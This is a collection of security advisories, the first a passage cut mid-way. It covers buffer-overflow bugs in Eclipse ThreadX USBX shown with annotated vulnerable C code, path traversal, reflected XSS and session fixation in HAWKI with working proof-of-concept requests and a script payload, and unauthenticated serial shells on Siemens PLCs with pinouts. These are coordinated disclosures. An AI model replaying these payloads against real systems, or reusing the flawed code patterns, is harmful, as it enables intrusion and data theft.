(UX_DCD_SIM_SLAVE_ED_STATUS_TRANSFER | UX_DCD_SIM_SLAVE_ED_STATUS_STALLED)) == 0) return(UX_ERROR); /* Get the logical endpoint from the physical endpoint. */ slave_endpoint = slave_ed -> ux_sim_slave_ed_endpoint; /* Get the pointer to the transfer request. */ slave_transfer_request = &slave_endpoint -> ux_slave_endpoint_transfer_request; /* Check the phase for this transfer, if this is the SETUP phase, treatment is different. Explanation of how control transfers are handled in the simulator: if the data phase is OUT, we handle it immediately, meaning we send all the data to the device and remove the STATUS TD in the same scheduler call. If the data phase is IN, we only take out the SETUP TD and handle the data phase like any other non-control transactions (i.e. the scheduler calls us again with the DATA TDs). */ if (td -> ux_sim_host_td_status & UX_HCD_SIM_HOST_TD_SETUP_PHASE) { /* For control transfer, stall is for protocol error and it's cleared any time when SETUP is received */ slave_ed -> ux_sim_slave_ed_status &= ~(ULONG)UX_DCD_SIM_SLAVE_ED_STATUS_STALLED; /* Validate the length to the setup transaction buffer. */ UX_ASSERT(td -> ux_sim_host_td_length == 8); // VULN: if assertions are compiled-out in production code, this check is ineffective /* Reset actual data length (not including SETUP received) so far. */ slave_transfer_request -> ux_slave_transfer_request_actual_length = 0; /* Move the buffer from the host TD to the device TD. */ _ux_utility_memory_copy(slave_transfer_request -> ux_slave_transfer_request_setup, td -> ux_sim_host_td_buffer, td -> ux_sim_host_td_length); /* Use case of memcpy is verified. */ // VULN: potential buffer overflow due to ineffective size check ``` If assertions were compiled-out in production code and `data_length` was attacker-controlled, the `_ux_utility_memory_copy()` function would have been able to write past the `transfer -> ux_slave_transfer_request_data_pointer` buffer: ```c ... UINT _ux_device_class_audio20_control_process(UX_DEVICE_CLASS_AUDIO *audio, UX_SLAVE_TRANSFER *transfer, UX_DEVICE_CLASS_AUDIO20_CONTROL_GROUP *group) { UX_SLAVE_ENDPOINT *endpoint; UX_DEVICE_CLASS_AUDIO20_CONTROL *control; UCHAR request; UCHAR request_type; UCHAR unit_id; UCHAR control_selector; UCHAR channel_number; ULONG request_length; ULONG data_length; ULONG i; ULONG n_sub, pos, min, max, res, freq; /* Get instances. */ endpoint = &audio -> ux_device_class_audio_device -> ux_slave_device_control_endpoint; transfer = &endpoint -> ux_slave_endpoint_transfer_request; /* Extract all necessary fields of the request. */ request = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_REQUEST); request_type = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_REQUEST_TYPE); unit_id = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_ENEITY_ID); control_selector = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_CONTROL_SELECTOR); channel_number = *(transfer -> ux_slave_transfer_request_setup + UX_DEVICE_CLASS_AUDIO_REQUEST_CHANNEL_NUMBER); request_length = _ux_utility_short_get(transfer -> ux_slave_transfer_request_setup + UX_SETUP_LENGTH); for (i = 0; i < group -> ux_device_class_audio20_control_group_controls_nb; i ++) { control = &group -> ux_device_class_audio20_control_group_controls[i]; /* Reset change map. */ control -> ux_device_class_audio20_control_changed = 0; /* Is this request a clock unit request? */ if (unit_id == control -> ux_device_class_audio20_control_cs_id) { /* Clock Source request. * We only support Sampling Frequency Control here. * The Sampling Frequency Control must support the CUR and RANGE(MIN, MAX, RES) attributes. */ ... /* We just support sampling frequency control, GET request. */ if ((request_type & UX_REQUEST_DIRECTION) == UX_REQUEST_IN && (control_selector == UX_DEVICE_CLASS_AUDIO20_CS_SAM_FREQ_CONTROL)) { switch(request) { case UX_DEVICE_CLASS_AUDIO20_CUR: /* Check request parameter. */ if (request_length < 4) break; /* Send sampling frequency. */ if (control -> ux_device_class_audio20_control_sampling_frequency) _ux_utility_long_put(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency); else _ux_utility_long_put(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency_cur); _ux_device_stack_transfer_request(transfer, 4, request_length); return(UX_SUCCESS); case UX_DEVICE_CLASS_AUDIO20_RANGE: /* Check request parameter. */ if (request_length < 2) break; if (control -> ux_device_class_audio20_control_sampling_frequency == 0) { /* Send range parameters, RANGE is customized. */ UX_ASSERT(control -> ux_device_class_audio20_control_sampling_frequency_range != UX_NULL); /* Get wNumSubRanges. */ n_sub = _ux_utility_short_get(control -> ux_device_class_audio20_control_sampling_frequency_range); UX_ASSERT(n_sub > 0); /* Calculate length, n_sub is 16-bit width, result not overflows ULONG. */ data_length = 2 + n_sub * 12; UX_ASSERT(data_length <= UX_SLAVE_REQUEST_CONTROL_MAX_LENGTH); // VULN: if assertions are compiled-out in production code, this check is ineffective /* Copy data. */ data_length = UX_MIN(data_length, request_length); _ux_utility_memory_copy(transfer -> ux_slave_transfer_request_data_pointer, control -> ux_device_class_audio20_control_sampling_frequency_range, data_length); /* Use case of memcpy is verified. */ // VULN: potential buffer overflow due to ineffective size check ... ``` Please note that there may be other instances/variants of these last bugs. Therefore, a thorough assessment of all assertions used to check buffer sizes in Eclipse ThreadX codebase is recommended. Finally, in Eclipse ThreadX USBX before pull request #161 was merged, there was a memory copy with unchecked size in the `_ux_host_class_pima_storage_info_get()` function in the following file: * /common/usbx_host_classes/src/ux_host_class_pima_storage_info_get.c There was no size check for the two memory copy operations via the `_ux_utility_memory_copy()` function marked below. Therefore, a write past the end of the fixed size (256 bytes) buffer `storage -> ux_host_class_pima_storage_description` could have occured: ```c UINT _ux_host_class_pima_storage_info_get(UX_HOST_CLASS_PIMA *pima, UX_HOST_CLASS_PIMA_SESSION *pima_session, ULONG storage_id, UX_HOST_CLASS_PIMA_STORAGE *storage) { UX_HOST_CLASS_PIMA_COMMAND command; UINT status; UCHAR *storage_buffer; UCHAR *storage_pointer; ULONG unicode_string_length; /* If trace is enabled, insert this event into the trace buffer. */ UX_TRACE_IN_LINE_INSERT(UX_TRACE_HOST_CLASS_PIMA_STORAGE_INFO_GET, pima, storage_id, storage, 0, UX_TRACE_HOST_CLASS_EVENTS, 0, 0) /* Check if this session is valid or not. */ if (pima_session -> ux_host_class_pima_session_magic != UX_HOST_CLASS_PIMA_MAGIC_NUMBER) return (UX_HOST_CLASS_PIMA_RC_SESSION_NOT_OPEN); /* Check if this session is opened or not. */ if (pima_session -> ux_host_class_pima_session_state != UX_HOST_CLASS_PIMA_SESSION_STATE_OPENED) return (UX_HOST_CLASS_PIMA_RC_SESSION_NOT_OPEN); /* Issue command to get the storage IDs. 1 parameter. */ command.ux_host_class_pima_command_nb_parameters = 1; /* Parameter 1 is the Storage ID. */ command.ux_host_class_pima_command_parameter_1 = storage_id; /* Other parameters unused. */ command.ux_host_class_pima_command_parameter_2 = 0; command.ux_host_class_pima_command_parameter_3 = 0; command.ux_host_class_pima_command_parameter_4 = 0; command.ux_host_class_pima_command_parameter_5 = 0; /* Then set the command to GET_STORAGE_INFO. */ command.ux_host_class_pima_command_operation_code = UX_HOST_CLASS_PIMA_OC_GET_STORAGE_INFO; /* Allocate some DMA safe memory for receiving the storage info block. */ storage_buffer = _ux_utility_memory_allocate(UX_SAFE_ALIGN, UX_CACHE_SAFE_MEMORY, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH); if (storage == UX_NULL) return(UX_MEMORY_INSUFFICIENT); /* Issue the command. */ status = _ux_host_class_pima_command(pima, &command, UX_HOST_CLASS_PIMA_DATA_PHASE_IN , storage_buffer, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH, UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH); /* Check the result. If the result is OK, the storage info block was read properly. */ if (status == UX_SUCCESS) { /* Uncompress the storage descriptor, at least the fixed part. */ _ux_utility_descriptor_parse(storage_buffer, _ux_system_class_pima_object_structure, UX_HOST_CLASS_PIMA_OBJECT_ENTRIES, (UCHAR *) storage); /* Copy the storage description field. Point to the beginning of the storage description string. */ storage_pointer = storage_buffer + UX_HOST_CLASS_PIMA_STORAGE_VARIABLE_OFFSET; /* Get the unicode string length. */ unicode_string_length = (ULONG) *storage_pointer ; /* Copy that string into the storage description field. */ _ux_utility_memory_copy(storage -> ux_host_class_pima_storage_description, storage_pointer, unicode_string_length); /* Use case of memcpy is verified. */ // VULN: unchecked copy size for a copy in a fixed size (256 bytes) buffer (UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH used to dynamically allocate storage_buffer is 512 bytes) /* Point to the volume label. */ storage_pointer = storage_buffer + UX_HOST_CLASS_PIMA_STORAGE_VARIABLE_OFFSET + unicode_string_length; /* Get the unicode string length. */ unicode_string_length = (ULONG) *storage_pointer ; /* Copy that string into the storage volume label field. */ _ux_utility_memory_copy(storage -> ux_host_class_pima_storage_volume_label, storage_pointer, unicode_string_length); /* Use case of memcpy is verified. */ // VULN: unchecked copy size for a copy in a fixed size (256 bytes) buffer (UX_HOST_CLASS_PIMA_STORAGE_MAX_LENGTH used to dynamically allocate storage_buffer is 512 bytes) } /* Free the original storage info buffer. */ _ux_utility_memory_free(storage_buffer); /* Return completion status. */ return(status); } ``` --[ 4 - Affected products Eclipse ThreadX before version 6.4.0 was affected by the vulnerabilities discussed in this advisory. The other bugs in Eclipse ThreadX NetX Duo and USBX that we reported will be patched in subsequent releases of Eclipse ThreadX. --[ 5 - Remediation Eclipse ThreadX maintainers have fixed all vulnerabilities discussed in this advisory. Please check the official Eclipse ThreadX channels for further information about fixes. --[ 6 - Disclosure timeline We reported the vulnerabilities discussed in this advisory to Microsoft in December 2023 and early January 2024, via their MSRC Researcher Portal [8]. For our efforts, we were awarded 7th place in the Top MSRC 2023 Q4 Azure Security Researchers Leaderboard [9]. Following the project ownership transfer to the Eclipse Foundation, with Microsoft's help, we coordinated with the new maintainers to provide vulnerability information and fixes to the ThreadX users' community. The (simplified) coordinated disclosure timeline follows: 2023-12-01: Reported two vulnerabilities to MSRC. 2023-12-13: MSRC confirmed our first vulnerability. 2023-12-14: MSRC confirmed our second vulnerability. 2023-12-21: Reported other two vulnerabilities to MSRC. 2023-12-31: Reported another vulnerability to MSRC. 2024-01-02: Reported other three vulnerabilities to MSRC. 2024-01-05: MSRC confirmed a vulnerability was fixed in version 6.4. 2024-01-06: MSRC informed us we made the 2023 Q4 leaderboard! 2024-01-10: MSRC confirmed another vulnerability was fixed in version 6.4. 2024-02-10: Asked MSRC for updates on all open reports. 2024-02-16: Asked the Eclipse Foundation for advice on how to proceed. 2024-02-20: Eclipse replied they were coordinating with MSRC. 2024-02-21: MSRC informed us of the ownership transfer to Eclipse. 2024-02-27: MSRC confirmed a third vulnerability was fixed in version 6.4. 2024-02-28: Upon MSRC's request, we submitted our reports to Eclipse. 2024-03-05: Eclipse started creating GitHub advisories for all reports. 2024-03-13: Provided Eclipse with clarifications on some of the reports. 2024-03-15: MSRC provided some additional feedback on the transition. 2024-03-18: Eclipse finished creating GitHub advisories for all reports. 2024-03-22: MSRC closed the remaining cases after the transition. 2024-03-25: Eclipse published CVE-2024-2212, CVE-2024-2214, CVE-2024-2452. 2024-03-29: Provided Eclipse with clarifications on remaining reports. 2024-04-24: Asked for a status update on the remaining reports. 2024-04-26: Agreed to declass the remaining reports to standard issues. 2024-05-02: Sent draft advisory and writeup to MSRC and Eclipse. 2024-05-28: Published advisory and writeup. --[ 7 - Acknowledgments We would like to thank MSRC and the Eclipse Foundation (with a special mention to Marta Rybczynska who took care of coordinated disclosure after the project ownership change) for triaging and fixing the reported vulnerabilities. It was a pleasure to work with you! --[ 8 - References [1] https://eclipse-foundation.blog/2023/11/21/introducing-eclipse-threadx/ [2] https://github.com/eclipse-threadx/ [3] https://security.humanativaspa.it/ost2-zephyr-rtos-and-a-bunch-of-cves/ [4] https://security.humanativaspa.it/multiple-vulnerabilities-in-rt-thread-rtos/ [5] https://security.humanativaspa.it/multiple-vulnerabilities-in-riot-os/ [6] https://security.humanativaspa.it/big-update-to-my-semgrep-c-cpp-ruleset/ [7] https://security.humanativaspa.it/a-collection-of-weggli-patterns-for-c-cpp-vulnerability-research/ [8] https://msrc.microsoft.com/report/vulnerability [9] https://msrc.microsoft.com/blog/2024/01/congratulations-to-the-top-msrc-2023-q4-security-researchers/ Copyright (c) 2024 Marco Ivaldi and Humanativa Group. All rights reserved. </code></pre>

<pre><code> SEC Consult Vulnerability Lab Security Advisory < 20240527-0 > ======================================================================= title: Multiple vulnerabilities product: HAWKI (Interaction Design Team at the University of Applied Sciences and Arts in Hildesheim/Germany) vulnerable version: 1.0.0-beta.1, versions before commit 146967f fixed version: Github commit 146967f CVE number: CVE-2024-25975, CVE-2024-25976, CVE-2024-25977 impact: high homepage: https://github.com/HAWK-Digital-Environments/HAWKI found: 2024-03-05 by: Florian Stuhlmann (Office Bochum) Thorger Jansen (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "HAWKI is a didactic interface for universities based on the OpenAI API. It is not necessary for users to create an account, the university ID is sufficient for login - no user-related data is stored." Source: https://github.com/HAWK-Digital-Environments/HAWKI Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Arbitrary File Overwrite (CVE-2024-25975) The application implements an up- and downvote function which alters a value within a JSON file. The POST parameters are not filtered properly and therefore an arbitrary file can be overwritten. The file can be controlled by an authenticated attacker, the content cannot be controlled. It is possible to overwrite all files for which the webserver has write access. It is required to supply a relative path (path traversal). 2) Reflected Cross-Site-Scripting (CVE-2024-25976) When LDAP authentication is activated in the configuration it is possible to obtain reflected XSS execution by creating a custom URL that the victim only needs to open in order to execute arbitrary JavaScript code in the victim's browser. 3) Session Fixation (CVE-2024-25977) The application does not change the session token when using the login or logout functionality. An attacker can set a session token in the victim's browser (e.g. via XSS) and prompt the victim to log in (e.g. via a redirect to the login page). This results in the victim's account being taken over. Proof of concept: ----------------- 1) Arbitrary File Overwrite (CVE-2024-25975) The following POST request can overwrite the file "AvatarFinanzen.png". This file is a default file located within the "img" folder. --- POST /downvote.php HTTP/2 Host: $host Cookie: PHPSESSID=<Session Id> Content-Type: application/x-www-form-urlencoded Content-Length: 25 ../img/AvatarFinanzen.png --- Both upvote.php and downvote.php are vulnerable. The vulnerable part in downvote.php is: --- [...] $id = file_get_contents("php://input"); $sanitizedId = htmlspecialchars($id, ENT_QUOTES, 'UTF-8'); $file = "feedback/" . $sanitizedId; [...] file_put_contents("feedback/$sanitizedId", json_encode($json)); [...] --- 2) Reflected Cross-Site-Scripting (XSS) (CVE-2024-25976) A call to the following URL will trigger an alertbox: --- https://$host/HAWKI/login.php/"><script>alert(document.cookie)</script> --- This is due to a fault in the file login.php where the content of "$_SERVER['PHP_SELF']" is reflected into the HTML of the website. Hence the attacker does not need a valid account in order to exploit this issue The following code is vulnerable: --- [...] $server = $_SERVER['PHP_SELF']; [...] echo '<form action = "' . $server . '" class="column" method = "post" > [...] --- The vulnerability is exploitable with the Apache2 default configuration. For other webservers, the vulnerability might not be exploitable. 3) Session Fixation (CVE-2024-25977) The attacker changes the value of PHPSESSID within the victim's browser to something like "abc". An attacker with the same value for PHPSESSID is now authenticated as well after the victim uses successfully logs in. Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * 1.0.0-beta.1 Vendor contact timeline: ------------------------ 2024-03-21: Contacting vendor through email referenced on Github 2024-03-22: Asking about email encryption, sending report unencrypted as requested. 2024-04-17: Asked the vendor again to receive details regarding the timeline. 2024-04-18: Vendor provides a patch pushed to the public repository. 2024-05: Fix verification phase. 2024-05-27: Release of security advisory. Solution: --------- The vendor provides a patch which can be downloaded from https://github.com/HAWK-Digital-Environments/HAWKI/commit/146967f3148e92d1640ffebc21d8914e2d7fb3f1 Workaround: ----------- No workaround available. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Florian Stuhlmann & Thorger Jansen / @2024 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240524-0 > ======================================================================= title: Exposed Serial Shell on multiple PLCs product: Siemens CP-XXXX Series (CP-2014, CP-2016, CP-2017, CP-2019, CP-5014) vulnerable version: All hardware revisions fixed version: Hardware is EOL, no fix CVE number: - impact: Low homepage: https://www.siemens.com found: ~2023-06-01 by: Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Constantin Schieber-Knöbl (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers." Source: https://new.siemens.com/global/en/company/about.html Business recommendation: ------------------------ The hardware is no longer produced nor offered to the market. Hence HW adaptions resulting in modified products are not possible anymore. The described HW behavior on this generation of devices cannot be corrected by means of FW patches. The risk of successful exploitation is considered low as physical access to those devices is needed. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Exposed Serial Shell on multiple Siemens PLCs A serial interface can be accessed with physical access to the PCB. After connecting to the interface, access to a shell with various debug functions as well as a login prompt is possible. Proof of concept: ----------------- 1) Exposed Serial Shell on multiple Siemens PLCs * CP-2016 (Figure 1) The serial interface on the CP-2016 can be accessed by connecting to the following through hole pins of an unpopulated header: +-+ |o| |o|RX |o|TX |o| |o| |o|GND +-+ * CP-2019 (Figure 2) The serial interface on the CP-2019 can be accessed by connecting to the following through hole pins of an unpopulated header: +-+ |o| |o|RX |o|TX |o| |o| |o|GND +-+ * CP-2014 (Figure 3) The serial interface on the CP-2014 can be accessed by connecting to the following through hole pins of an unpopulated header: +-+ |o|GND |o| |o| |o|RX |o|TX |o| +-+ * CP-2017 (Figure 4) The serial interface on the CP-2017 can be accessed on the compute module by connecting to pins 9 and 10 on the populated SMD connector: 1 TX RX '-'-'-'-'-'-'-'-'-' /-------------------\ | | |-------------------| +'-'-'-'-'-'-'-'-'-'+ 11 20 * CP-5014 (Figure 5) The serial interface on the CP-5014 can be accessed on the compute module by connecting to pins 1 and 2 on the populated SMD connector: RX TX 10 '-'-'-'-'-'-'-'-'-' /-------------------\ | | |-------------------| +'-'-'-'-'-'-'-'-'-'+ 11 20 All serial connections allow access to the SH1703 shell in version 1.00. The shell requires no authentication and allows the usage of multiple commands. The following output can be seen on all devices: --------------------------------------------------- XXXXX XXX XXX X XXXXX XXX XXX X X X X XXX X X X X X X X X X X X X X X XXXXX XXXXX X X X X XX X X X X X X X X X X X X X X X X X X XXXXX XXX XXX XXXXX X XXX XXX --------------------------------------------------- 1703 Shell [V1.00] (c) by 1703 Development Team type 'help' or '?' or press 'F1' for help SH1703> Initialize system .. . Init Done. system startup after Power-Up ... Install device 'USB Server'. RTC time not valid RTC time not valid RTC time not valid Reg: 100 Komp: 2 BSE: 20 Hello from <R#100 / K#2 / BSE#2> FW-ID: 2019 FW-Version: 0.06A01 Startup ZBGs ... done. system ready SH1703>help Available commands: hist Display command history !<n> Execute <n> command from stack ? [<cmd>] Display this message help [<cmd>] Display this message echo <text> Displays text call <file> Run script file cls Clear screen loop <cmd> Loop-execution of cmd ldfile <file> Load ascii file db <a> [-b|w|d<x> [-n<x>]] Display memory byte/word/dword wb <a> <val> [-b|w|d<x>] Write memory byte/word/dword mb <a> [-b|w|d<x> [-n<x>]] Monitoring memory byte/word/dword login Login logoff Logoff pci ... PCI Commands bemrk Run Benchmark drv List installed drives dir List files in directory del [<drv:>]<file> Delete file ren <src> <dest> Rename or move file cd <dir>|<..> Change current directory or drive md <dir> Make directory rd <dir> Remove directory type [<drv:>]<file> Displays the contents of a file copy <src> <dest> Copy a file findstr <file> <str> Find a string in a textfile mkdisk <drvname> <size> Make a Ramdisk uidisk <drvname> Close and uninstall a disk format <drvname> Format drive mem_wr <addr> <size> <des> Write mem to file idr Read from diagnostic ring icr Clear diagnostic ring idd Debug-Trace ON bp Read all breakpoint settings bpf [<file>] Set File for Debugprint (no arg = stdout) is ... Debugger settings ig [f|s] Display BPs / Clear all BPs idb Read DB-Breaks idt Read DB-Trace Settings icz Clear breakpoint counters dev ... ZIO-Device commands bsp ... bsp commands ftrc ... FTRC Commands banner Display the banner pl Display process list pi [<appl_nr>] Display process info ad -c|d|k|s APP-Debug Create|Detach|Kill|Start tl Display task list (all processes) tm [-r] Display task monitor (-r = runtime) tc <taskname> Display task context td <taskID> Display task descriptor tq Display task queues sysztsk Display ZOS-tasks of system process appztsk [<appl_nr>] Display ZOS-tasks of appl-process(es) stack Display stack usage of all tasks stsk -c|d|e|s|r ZOS-Task Create|Del|Exch|Suspend|Resume tsktrc -s|r|c ZOS-Task-Trace Start|Read|Clear set [<name>=<val>] Display, set or remove environment variables time Display the current time timeset Set the current time mem Display memory usage status Display system status informations ver Display version informations r Reset system element (R,R Cxx,R Pxx,R Zxx klog [dis|ena|all] Display, disable or enable kernel logging psp_info Display prozessor configuration infos int_info Interrupt-Info-List int_gen Generate Interrupt (for Admin only) tlbs Display TLBs ga [<appl_nr>] Start Subshell of application tsd Debug Timeserver mci MCI Commands usb <cmd> USB commands mmc <cmd> MMC Commands zhs ZHS commands zpv Parameter infos zdt data transporter fsn ZIO/FSN statistics net <enet|emac|mal> <dev> Network statistics prd <pg> <reg> <len> Read PHY register (len: 8|16|32) pwr <pg> <reg> <len> <data> Write PHY register (len: 8|16|32) rmib Reset all statistic counters scfg Display broadcom switch registers ipaddr <dev> Display ip addresses on interface route Display routing table socket Display socket statistic tcp Display tcp statistic udp Display udp statistic arp Display arp cache ping host-ipaddr send ICMP ECHO_REQUEST to a host arl Switch Address Resolution table ebuf Statistic for Buffer handling FSN tls_ciph print cipher suites for all connections tls_obj idx print connection objects tls_log log level for tls lib tls_deb idx print connection debug cnts tlscache print cert/key cache opensslm print mem pool statistic for openssl tlsdeb_s START mem pool debug function tlsdeb_e END mem pool debug function tlsdeb_r print mem pool debug for openssl tlsdeb_c CLEAR mem pool debug function sap special application function Available Function-Keys: F1 Help F2 Display system status informations F3 Display Last command F5 Display the current time F7 History F8 Display memory usage F9 Display ZOS-Task Infos F10 Display Tasklist F11 Execute Last command SH1703> ---------------------------------------- Vulnerable / tested versions: ----------------------------- The following versions have been tested which were the latest version available at the time of the test: * CP-2016: CPCX26 V0.06A01 * CP-2019: PCCX26 V0.06A01 * CP-2014: CPCX25 V0.05A04 * CP-2017: PCCX25 V0.11A10 * CP-5056: CPCX55 V0.10A04 Vendor contact timeline: ------------------------ 2024-03-05: Contacting vendor through productcert@siemens.com 2024-03-06: Siemens tracks this issue as case #04393 2024-04-03: Requested status update. 2024-04-03: Product is EOL, no fix planned. 2024-04-29: Informed Siemens about planned publication of advisory. 2024-04-30: Siemens, requests draft of advisory. Advisory is sent for review. 2024-05-07: Siemens requested small changes in the Solution and Business Recommendation. 2024-05-24: Public release of security advisory. Solution: --------- The hardware is no longer produced nor offered to the market. Hence HW adaptions resulting in modified products are not possible anymore. The described HW behavior on this generation of devices cannot be corrected by means of FW patches. The risk of successful exploitation is considered low as physical access to those devices is needed. Workaround: ----------- Make sure to strictly limit physical access to the PLC during and also after its life cycle. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knöbl / @2024 </code></pre>